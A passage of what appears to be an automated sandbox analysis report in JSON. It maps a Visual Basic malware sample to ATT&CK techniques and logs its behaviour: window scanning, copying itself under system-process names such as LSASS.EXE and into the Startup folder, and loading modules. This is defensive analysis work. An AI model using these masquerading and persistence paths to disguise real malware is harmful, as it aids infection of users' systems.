"https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"RegEdit_RegEdit\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for window \"Registry Editor\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for window \"Folder Options\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for window \"Local Settings\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"ExploreWClass\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"CabinetWClass\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"RebarWindow32\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"ComboBoxEx32\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"ComboBox\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"Edit\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location C:\\4k51k4.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location C:\\4k51k4.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.scr to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.scr to new location C:\\4k51k4.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CopyFileA\" to copy C:\\\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005648)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"KERNEL32\" at base 77700000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"DWMAPI.DLL\" at base 741e0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"SHELL32.DLL\" at base 76860000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"OLE32.DLL\" at base 777e0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"USER32\" at base 76790000\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74900000\n \"4k51k4.exe\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"4k51k4.exe\" loaded module \"SXS.DLL\" at base 75a00000\n \"4k51k4.exe\" loaded module \"CRYPTSP.DLL\" at base 75500000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"4k51k4.exe\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"4k51k4.exe\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"4k51k4.exe\" loaded module \"DWMAPI.DLL\" at base 741e0000\n \"4k51k4.exe\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"4k51k4.exe\" loaded module \"SHELL32.DLL\" at base 76860000\n \"4k51k4.exe\" loaded module \"OLE32.DLL\" at base 777e0000\n \"4k51k4.exe\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"4k51k4.exe\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"4k51k4.exe\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"4k51k4.exe\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"4k51k4.exe\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"4k51k4.exe\" loaded module \"USER32\" at base 76790000\n \"4k51k4.exe\" loaded module \"KERNEL32\" at base 77700000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 741e0000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 77700000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76860000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 777e0000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76790000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74900000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75a00000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 75500000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 77700000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"WINLOGON.EXE\" loaded module \"MSVBVM60.DLL\" at base 72940000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74900000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75a00000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 75500000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76860000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 777e0000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76790000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 77700000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74900000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75a00000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75500000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 741e0000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76860000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 777e0000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76790000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 77700000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76860000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 777e0000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76790000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74900000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75a00000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 75500000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76860000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 777e0000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76790000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 77700000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75a00000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75500000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71470000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 77700000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74900000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76500000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75a00000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75500000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75290000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 766e0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 759f0000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 741e0000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 77700000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76860000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 777e0000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75eb0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74650000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77700000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74f60000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 774b0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76630000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76790000\n \"SMSS.EXE\" loaded module 